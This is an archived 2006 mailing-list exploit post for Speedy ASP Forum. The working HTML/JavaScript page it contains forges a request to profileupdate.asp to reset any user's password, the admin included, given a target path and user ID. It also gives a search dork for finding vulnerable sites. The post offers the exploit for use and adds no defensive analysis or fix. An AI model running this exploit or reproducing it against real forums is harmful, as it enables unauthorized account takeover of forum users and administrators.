Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

CosmicShoppingCart (search.php) Remote SQL Injection Vulnerability

[Full-disclosure] [ GLSA 200605-16 ] CherryPy: Directory traversal vulnerability

[Full-disclosure] Multiple XSS Vulnerabilities in Tikiwiki 1.9.x

WikiNi Persistent Cross Site Scripting Vulnerability

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	30.05.2006
Subject:	Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit

# Title  :   Speedy ASP Forum(profileupdate.asp) User Pass Change Exploit

# Dork   :   Copyright © ASPwebSoft

# Author :   ajann

# greetz :   Nukedx

###Code:

Save to .htm

*********************************************************************************
****************************************************


<title>Pass Change</title>
<script language="JavaScript">  
//Coded ajann
function islemKontrol(){
    if(document.InputForm.name.value=="" || document.InputForm.email.value=="" ||
document.InputForm.id.value=="" || document.InputForm.password.value=="" ||
document.InputForm.passwordre.value=="" || document.InputForm.country.options.value == 0 ||
document.InputForm.adres.value=="" ){
         alert("Alani Bos Biraktiniz")
         return false
    }
{
document.InputForm.action= document.InputForm.adres.value
document.InputForm.submit();

return true
}
}
</script>

<body bgcolor="#000000">

<form name = "InputForm" method = "post" onSubmit = 'return islemKontrol()'>
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User Name&nbsp;&nbsp;&nbsp;&nbsp;
:&nbsp;&nbsp; </b></font>
<input type="text" name="name"  value="" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: Surname Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb
sp;
:&nbsp; </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">&nbsp;&nbsp; Example:
mail@domain.com</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
İd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
:&nbsp; </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial">&nbsp; Example: İd:1 Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country&nbsp; :&nbsp; </b>
</font>
<select size="1"  name="country">
<option value=0>Choose Country</option>
<option  value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: Turkey</font><br>

<b>

<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&
nbsp;
:&nbsp; </font></b>

<input type = "text" name="password" value="Password" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2"
color="#FF0000">&nbsp;&nbsp;
:&nbsp; </font></b>
<input type = "text" name="passwordre" value="Re Password" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example: 123456</font><br>

<font face="Verdana" size="2" color="#FF0000"><b>Form Action&nbsp; &nbsp; : </b>
</font>

<input type="text" name="adres" value="profileupdate.asp" size="20">&nbsp;
<font size="1" color="#C0C0C0" face="Arial">&nbsp;Example:
http://[target]/[path]/profileupdate.asp</font></p>

<p>

<input type = "submit" name="Submit" value="Change"> </p>

<br>

&nbsp;</form>
*********************************************************************************
****************************************************

And Code